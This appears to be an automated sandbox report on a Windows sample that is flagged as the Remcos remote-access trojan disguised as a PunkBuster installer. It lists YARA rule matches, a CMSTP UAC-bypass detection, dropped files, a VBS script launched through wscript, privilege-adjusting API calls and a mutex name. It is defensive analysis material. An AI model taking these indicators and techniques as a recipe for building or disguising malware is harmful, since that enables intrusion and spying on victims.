              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DBB77 SystemParametersInfoW,2_2_000DBB77

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Drops large PE files
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile dump: PerfectouinVans.exe.0.dr 979567347Jump to dropped file
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D58B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_000D58B9
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BF3700_2_004BF370
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004C4DBB0_2_004C4DBB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DD0712_2_000DD071
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FD0982_2_000FD098
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_001120D22_2_001120D2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F71502_2_000F7150
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F61AA2_2_000F61AA
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000E62542_2_000E6254
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F13772_2_000F1377
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F651C2_2_000F651C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DE5DF2_2_000DE5DF
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0010C7392_2_0010C739
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000E67CB2_2_000E67CB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F67C62_2_000F67C6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FC9DD2_2_000FC9DD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F2A492_2_000F2A49
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F6A8D2_2_000F6A8D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FCC0C2_2_000FCC0C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F4D222_2_000F4D22
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F6D482_2_000F6D48
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00100E202_2_00100E20
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FCE3B2_2_000FCE3B
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000E6E732_2_000E6E73
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00112F002_2_00112F00
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D2F452_2_000D2F45
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000E6FAD2_2_000E6FAD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BF3702_2_004BF370
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004C4DBB2_2_004C4DBB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 000C1F66 appears 49 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 004010F0 appears 34 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 000F38A5 appears 41 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 000F3FB0 appears 55 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 004BC0F4 appears 126 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 000C20E7 appears 41 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 004BD2C8 appears 82 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 00401072 appears 114 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: String function: 0048CFD0 appears 50 times
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 4wECQoBvYC.exe
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 4wECQoBvYC.exe
              Source: 4wECQoBvYC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@5/4@2/2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_00401896 __EH_prolog,GetLastError,FormatMessageA,LocalFree,0_2_00401896
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004090DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_004090DF
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D6AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_000D6AB7
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004090DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_004090DF
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CE219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,2_2_000CE219
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0040631D __EH_prolog,CoCreateInstance,0_2_0040631D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DA63F FindResourceA,LoadResource,LockResource,SizeofResource,2_2_000DA63F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D9BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_000D9BC4
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile created: C:\Users\user\Documents\PerfectouinJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeMutant created: \Sessions\1\BaseNamedObjects\kkdhhcnbvyrmqyodgffgfdds-SO2AWR
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile created: C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbsJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
              Source: 4wECQoBvYC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 4wECQoBvYC.exeReversingLabs: Detection: 28%
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
